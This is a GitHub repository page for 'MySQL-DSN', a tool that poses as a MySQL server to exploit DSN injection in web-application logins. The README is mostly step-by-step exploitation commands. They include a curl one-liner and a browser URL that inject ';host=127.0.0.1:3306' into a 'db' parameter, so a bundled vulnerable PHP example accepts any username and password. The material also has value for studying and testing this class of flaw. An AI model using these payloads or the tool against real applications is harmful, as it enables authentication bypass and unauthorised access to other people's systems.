Skip to content
/ MySQL-DSN Public

The purpose of this tool is to Act like "MySQL Server" Without Installing MySQL Server, And return a row with the same username And password of the query.

8 stars 5 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Diefunction/MySQL-DSN

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
example
example
 
 
MySQL-DSN.py
MySQL-DSN.py
 
 
README.md
README.md
 
 

Repository files navigation

MySQL-DSN

MYSQL-DSN is a tool that act like as "MySQL server" to exploit DSN vulnerability in authentication by return the entered username, and password.

Example

if MySQL server is installed and running, stop MySQL server

service mysql stop
pkill -9 mysql

start MySQL-DSN server

python3 MySQL-DSN.py

start apache2 web server to demonstrate the vulnerable web application

service apache2 start

copy index.php success.php from example folder to your web server default /var/www/html/

cp ./example/index.php ./example/success.php /var/www/html/

exploit using curl

curl --cookie $(curl -I -X GET 'http://localhost/index.php?login=&username=test&password=test&db=testing;host=127.0.0.1:3306' | grep -o -P '(?<=: ).*(?=;)' | awk 'NR==1{print $1}') -X GET http://localhost/success.php

exploit using the browser

http://localhost/index.php?login=&username=test&password=test&db=testing;host=127.0.0.1:3306

About

The purpose of this tool is to Act like "MySQL Server" Without Installing MySQL Server, And return a row with the same username And password of the query.

Topics

mysql mysql-server mysql-rogue mysql-exploit mysql-mitm

Resources

Readme
Activity

Stars

8 stars

Watchers

1 watching

Forks

5 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages